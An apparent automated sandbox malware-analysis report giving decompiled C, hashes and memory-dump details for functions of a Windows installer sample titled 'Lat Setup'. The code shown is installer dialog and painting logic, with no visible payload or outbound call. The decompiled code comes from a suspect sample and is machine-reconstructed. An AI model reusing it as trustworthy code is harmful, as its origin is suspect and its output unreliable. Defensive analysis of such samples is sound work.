                                                                        • Source File: 00000000.00000002.240764682.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.240760281.0000000010000000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.240769821.0000000010002000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 024D1790, Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404B80, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404ACE(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B4E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a888;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										if( *0x42f42c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x7c930d
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E0040417B(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a888 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a888 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004041B0(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004041B0(_v12);
								L93:
								return E004041E2(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                        0x00404b9e
                                                                        0x00404ba6
                                                                        0x00404bae
                                                                        0x00404bb4
                                                                        0x00404bcc
                                                                        0x00404bcf
                                                                        0x00404bd0
                                                                        0x00404dfd
                                                                        0x00404e04
                                                                        0x00404e18
                                                                        0x00404e06
                                                                        0x00404e08
                                                                        0x00404e0b
                                                                        0x00404e0c
                                                                        0x00404e13
                                                                        0x00404e13
                                                                        0x00404e24
                                                                        0x00404e32
                                                                        0x00404e35
                                                                        0x00404e4b
                                                                        0x00404ec0
                                                                        0x00404ec3
                                                                        0x00404ec5
                                                                        0x00404ecf
                                                                        0x00404edd
                                                                        0x00404edd
                                                                        0x00404edf
                                                                        0x00404ee9
                                                                        0x00404eef
                                                                        0x00404ef2
                                                                        0x00404ef5
                                                                        0x00404f10
                                                                        0x00404ef7
                                                                        0x00404f01
                                                                        0x00404f01
                                                                        0x00404ef5
                                                                        0x00404ee9
                                                                        0x00000000
                                                                        0x00404ec3
                                                                        0x00404e50
                                                                        0x00404e5b
                                                                        0x00404e60
                                                                        0x00404e67
                                                                        0x00404e6c
                                                                        0x00404e70
                                                                        0x00404e7b
                                                                        0x00404e7b
                                                                        0x00404e7f
                                                                        0x00404e83
                                                                        0x00404e87
                                                                        0x00404e9a
                                                                        0x00404e89
                                                                        0x00404e89
                                                                        0x00404e90
                                                                        0x00404e96
                                                                        0x00404e92
                                                                        0x00404e92
                                                                        0x00404e92
                                                                        0x00404e90
                                                                        0x00404e9e
                                                                        0x00404ea0
                                                                        0x00404eb3
                                                                        0x00404eb6
                                                                        0x00404eb9
                                                                        0x00404eb9
                                                                        0x00404e83
                                                                        0x00000000
                                                                        0x00404e70
                                                                        0x00404e52
                                                                        0x00404e59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404f13
                                                                        0x00404f13
                                                                        0x00404f1a
                                                                        0x00404f8b
                                                                        0x00404f93
                                                                        0x00404f9b
                                                                        0x00404f9b
                                                                        0x00404fa4
                                                                        0x00404fa6
                                                                        0x00404fad
                                                                        0x00404fb0
                                                                        0x00404fb0
                                                                        0x00404fb6
                                                                        0x00404fbd
                                                                        0x00404fc0
                                                                        0x00404fc0
                                                                        0x00404fc6
                                                                        0x00404fcc
                                                                        0x00404fd2
                                                                        0x00404fd2
                                                                        0x00404fdf
                                                                        0x0040513f
                                                                        0x00405146
                                                                        0x00405163
                                                                        0x00405169
                                                                        0x0040517b
                                                                        0x0040517b
                                                                        0x00000000
                                                                        0x00404fe5
                                                                        0x00404fe7
                                                                        0x00404fec
                                                                        0x00404ff1
                                                                        0x00404ff6
                                                                        0x00404ff8
                                                                        0x00404ff8
                                                                        0x00404ff9
                                                                        0x00404ffa
                                                                        0x00404ffc
                                                                        0x00404ffc
                                                                        0x00405004
                                                                        0x00405045
                                                                        0x00405047
                                                                        0x00405057
                                                                        0x0040505a
                                                                        0x0040505f
                                                                        0x00405066
                                                                        0x00405069
                                                                        0x0040510b
                                                                        0x00405113
                                                                        0x0040511b
                                                                        0x0040511b
                                                                        0x00405121
                                                                        0x00405129
                                                                        0x0040513a
                                                                        0x0040513a
                                                                        0x00000000
                                                                        0x00405129
                                                                        0x0040506f
                                                                        0x00405072
                                                                        0x00405078
                                                                        0x0040507d
                                                                        0x0040507f
                                                                        0x00405081
                                                                        0x00405087
                                                                        0x0040508e
                                                                        0x00405093
                                                                        0x0040509a
                                                                        0x0040509d
                                                                        0x0040509d
                                                                        0x004050a4
                                                                        0x004050b0
                                                                        0x004050b4
                                                                        0x004050b6
                                                                        0x004050b6
                                                                        0x004050a6
                                                                        0x004050a8
                                                                        0x004050a8
                                                                        0x004050d6
                                                                        0x004050e2
                                                                        0x004050f1
                                                                        0x004050f1
                                                                        0x004050f3
                                                                        0x004050f6
                                                                        0x004050ff
                                                                        0x00000000
                                                                        0x00405006
                                                                        0x00405011
                                                                        0x00405014
                                                                        0x00405019
                                                                        0x0040501b
                                                                        0x0040501f
                                                                        0x0040502f
                                                                        0x00405039
                                                                        0x0040503b
                                                                        0x0040503e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405021
                                                                        0x00405021
                                                                        0x00405027
                                                                        0x00405029
                                                                        0x00405029
                                                                        0x0040502a
                                                                        0x0040502b
                                                                        0x00000000
                                                                        0x00405021
                                                                        0x00405004
                                                                        0x00404fdf
                                                                        0x00404f22
                                                                        0x00000000
                                                                        0x00404f38
                                                                        0x00404f42
                                                                        0x00404f47
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404f59
                                                                        0x00404f5e
                                                                        0x00404f6a
                                                                        0x00404f6a
                                                                        0x00404f6c
                                                                        0x00404f7b
                                                                        0x00404f7d
                                                                        0x00404f81
                                                                        0x00404f84
                                                                        0x00000000
                                                                        0x00404f84
                                                                        0x00404f22
                                                                        0x00404bd6
                                                                        0x00404bd9
                                                                        0x00404bdc
                                                                        0x00404bec
                                                                        0x00404bff
                                                                        0x00404c0a
                                                                        0x00404c10
                                                                        0x00404c1e
                                                                        0x00404c31
                                                                        0x00404c36
                                                                        0x00404c41
                                                                        0x00404c4a
                                                                        0x00404c60
                                                                        0x00404c70
                                                                        0x00404c7c
                                                                        0x00404c7c
                                                                        0x00404c81
                                                                        0x00404c87
                                                                        0x00404c89
                                                                        0x00404c8c
                                                                        0x00404c91
                                                                        0x00404c96
                                                                        0x00404c98
                                                                        0x00404c98
                                                                        0x00404cb8
                                                                        0x00404cb8
                                                                        0x00404cba
                                                                        0x00404cbb
                                                                        0x00404cc0
                                                                        0x00404cc6
                                                                        0x00404cca
                                                                        0x00404ccf
                                                                        0x00404cd7
                                                                        0x00404cdb
                                                                        0x00404ce0
                                                                        0x00404ce5
                                                                        0x00404ced
                                                                        0x00404cf0
                                                                        0x00404dbf
                                                                        0x00404dd2
                                                                        0x00000000
                                                                        0x00404cf6
                                                                        0x00404cf9
                                                                        0x00404cfc
                                                                        0x00404cff
                                                                        0x00404cff
                                                                        0x00404d04
                                                                        0x00404d0d
                                                                        0x00404d10
                                                                        0x00404d14
                                                                        0x00404d17
                                                                        0x00404d1a
                                                                        0x00404d23
                                                                        0x00404d2c
                                                                        0x00404d2f
                                                                        0x00404d32
                                                                        0x00404d35
                                                                        0x00404d73
                                                                        0x00404d9e
                                                                        0x00404d75
                                                                        0x00404d84
                                                                        0x00404d84
                                                                        0x00404d37
                                                                        0x00404d3a
                                                                        0x00404d48
                                                                        0x00404d52
                                                                        0x00404d5a
                                                                        0x00404d61
                                                                        0x00404d6c
                                                                        0x00404d6c
                                                                        0x00404d35
                                                                        0x00404da4
                                                                        0x00404da5
                                                                        0x00404db1
                                                                        0x00404db1
                                                                        0x00404dbd
                                                                        0x00404dd8
                                                                        0x00404ddb
                                                                        0x00404df8
                                                                        0x00000000
                                                                        0x00404ddd
                                                                        0x00404de2
                                                                        0x00404deb
                                                                        0x0040517d
                                                                        0x0040518f
                                                                        0x0040518f
                                                                        0x00404ddb
                                                                        0x00000000
                                                                        0x00404dbd
                                                                        0x00404cf0

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 2564846305-813528018
                                                                        • Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                                        • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                        • Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                                        • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004042E6, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42985c =  *0x42985c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E0040458A(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f428, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a068 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404566();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x7c930d
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f478;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004042B1;
				E0040417B(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E0040417B(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E004041B0(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f434 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x42985c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42985c = 0;
				return 0;
			}


















                                                                        0x004042f6
                                                                        0x0040441b
                                                                        0x00404477
                                                                        0x0040447b
                                                                        0x00404548
                                                                        0x0040454a
                                                                        0x0040454a
                                                                        0x00404550
                                                                        0x00404550
                                                                        0x00404553
                                                                        0x00000000
                                                                        0x0040455a
                                                                        0x00404489
                                                                        0x0040448b
                                                                        0x00404495
                                                                        0x004044a0
                                                                        0x004044a3
                                                                        0x004044a6
                                                                        0x004044b1
                                                                        0x004044b4
                                                                        0x004044bb
                                                                        0x004044c9
                                                                        0x004044e1
                                                                        0x004044e3
                                                                        0x004044eb
                                                                        0x004044fa
                                                                        0x004044fc
                                                                        0x004044fc
                                                                        0x004044bb
                                                                        0x00404506
                                                                        0x00000000
                                                                        0x00404511
                                                                        0x00404515
                                                                        0x00404526
                                                                        0x00404526
                                                                        0x0040452c
                                                                        0x0040453a
                                                                        0x0040453a
                                                                        0x00000000
                                                                        0x0040453e
                                                                        0x00404506
                                                                        0x00404426
                                                                        0x00000000
                                                                        0x0040443a
                                                                        0x00404440
                                                                        0x00404446
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040446b
                                                                        0x0040446d
                                                                        0x00404472
                                                                        0x00000000
                                                                        0x00404472
                                                                        0x00404426
                                                                        0x004042fc
                                                                        0x004042ff
                                                                        0x00404304
                                                                        0x00404306
                                                                        0x00404315
                                                                        0x00404315
                                                                        0x0040431c
                                                                        0x0040431f
                                                                        0x00404321
                                                                        0x00404326
                                                                        0x0040432f
                                                                        0x00404335
                                                                        0x00404341
                                                                        0x00404344
                                                                        0x0040434d
                                                                        0x00404352
                                                                        0x00404355
                                                                        0x0040435a
                                                                        0x00404371
                                                                        0x00404378
                                                                        0x0040438b
                                                                        0x0040438e
                                                                        0x004043a3
                                                                        0x004043aa
                                                                        0x004043af
                                                                        0x004043b4
                                                                        0x004043b4
                                                                        0x004043c3
                                                                        0x004043d2
                                                                        0x004043e4
                                                                        0x004043e9
                                                                        0x004043f9
                                                                        0x004043fb
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: GHFGHFGHFDGDFGDFg$N
                                                                        • API String ID: 3103080414-2795107479
                                                                        • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                        • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                        • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                        • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Lat Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
